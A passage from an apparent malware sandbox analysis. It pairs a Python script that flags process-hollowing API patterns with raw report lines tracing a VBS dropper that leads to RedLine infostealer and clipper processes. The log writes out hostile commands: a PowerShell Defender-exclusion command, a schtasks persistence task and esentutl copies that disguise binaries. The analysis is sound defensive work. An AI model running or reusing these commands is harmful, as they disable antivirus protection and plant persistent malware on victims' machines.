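# Hollowing stages and the APIs that implement them (assumed table for this
# example; the Zw* and kernel32 aliases are added so the same table works on
# other samples).
STAGES = {
    "create_process": {"CreateProcessA", "CreateProcessW", "CreateProcessAsUserA",
                       "CreateProcessAsUserW", "NtCreateUserProcess"},
    "unmap":          {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "alloc":          {"NtAllocateVirtualMemory", "ZwAllocateVirtualMemory", "VirtualAllocEx"},
    "write":          {"NtWriteVirtualMemory", "ZwWriteVirtualMemory", "WriteProcessMemory"},
    "context":        {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
    "resume":         {"NtResumeThread", "ZwResumeThread", "ResumeThread"},
}
# The four calls that separate hollowing from a plain remote-thread injection.
CORE = {"unmap", "write", "context", "resume"}

ROW_RE = re.compile(r"Code function: (\d+)_(\d+)_([0-9A-Fa-f]+) (.*)")


def parse_rows(rows):
    """Group rows by sandbox process id: {pid: [(function_id, [api, ...]), ...]}."""
    per_pid = defaultdict(list)
    for row in rows:
        m = ROW_RE.search(row)
        if not m:
            continue
        pid, run, addr, apis = m.groups()
        per_pid[int(pid)].append((f"{pid}_{run}_{addr}", [a for a in apis.split(",") if a]))
    return per_pid


def stage_hits(functions):
    """Map each stage to the function ids whose API list contains one of its calls."""
    hits = {}
    for func_id, apis in functions:
        present = set(apis)
        for stage, names in STAGES.items():
            if names & present:
                hits.setdefault(stage, []).append(func_id)
    return hits


def verdict(hits):
    if CORE.issubset(hits):
        return "process hollowing (RunPE)"
    if "write" in hits and not {"context", "resume"}.isdisjoint(hits):
        return "remote write plus thread control (injection)"
    return "no injection primitives"


def analyse(rows):
    """{pid: (verdict, {stage: [function ids]})}"""
    result = {}
    for pid, functions in parse_rows(rows).items():
        hits = stage_hits(functions)
        result[pid] = (verdict(hits), hits)
    return result


if __name__ == "__main__":
    for pid, (v, hits) in sorted(analyse(CODE_FUNCTION_ROWS).items()):
        print(f"process {pid}: {v}")
        for stage, funcs in hits.items():
            print(f"  {stage:15} {', '.join(funcs)}")
```

The verdict is based on which APIs a function imports, not on their execution order, so treat it as a triage hint that the sandbox's dynamic "process hollowing" signature then confirms. Note that x.exe pairs CreateProcessAsUserW with ResumeThread in one function (2_2_02DCF7C8) and keeps the unmap/write/context work in separate helpers; whether the child was started with CREATE_SUSPENDED is not visible from the API names alone.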
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DCF7C8 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB20C4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DBC977
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00408C60
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0040DC11
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00407C3F
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00418CCC
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00406CA0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_004028B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0041A4BE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00418244
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00401650
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00402F20
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_004193C4
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0044E3F6
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00418788
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00402F89
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00402B90
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_004073A0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00855980
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00826EAF
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_008639A3
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_008251EE
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0086515C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0085D580
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00827F80
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_00853780
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0085C7F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_02CC1025
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_02CC1030
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059AF8B7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059A0040
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059A9FA9
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059AAFF0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059A4A30
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059AD5A8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_059A3F7F
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A2A500
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A217F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A2D9B0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A20BE0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A237E7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A237F8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_05A20F28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04FDB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_04FDB470
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: 16_2_02CE20C4
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DB44DC appears 74 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DB46D4 appears 244 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DC89D0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DB4500 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DB4860 appears 949 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function: 02DC894C appears 56 times
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: String function: 0040E1D8 appears 43 times
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: String function: 02CE46D4 appears 155 times
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: String function: 02CE4860 appears 683 times
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Code function: String function: 02CF894C appears 50 times
Source: IBKB.vbs | Initial sample: Strings found which are bigger than 50
Source: 19.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 24.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 24.0.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 19.2.Native_neworigin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_neworigin.exe.5200f08.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.Native_neworigin.exe.5850000.8.raw.unpack, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@41/22@69/17
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DB7FD2 GetDiskFreeSpaceA
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_02DC6DC8 CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Code function: 9_2_0084CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
Source: C:\Users\user\AppData\Local\Temp\x.exe | File created: C:\Users\Public\Libraries\PNO
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: NULL
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9aa529efaf59dc673779169-b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-9aa529efaf59dc6-inf
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeCommand line argument: 08A9_2_00413780
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\Public\Libraries\Juqmtmya.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: IBKB.vbs | ReversingLabs: Detection: 39%
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Evasive API call chain: __getmainargs,DecisionNodes,exitgraph_8-540
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IBKB.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:29 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: unknown | Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF | Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif | Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: url.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ieframe.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ??.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: ???????.dll
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ??.dllJump to behavior
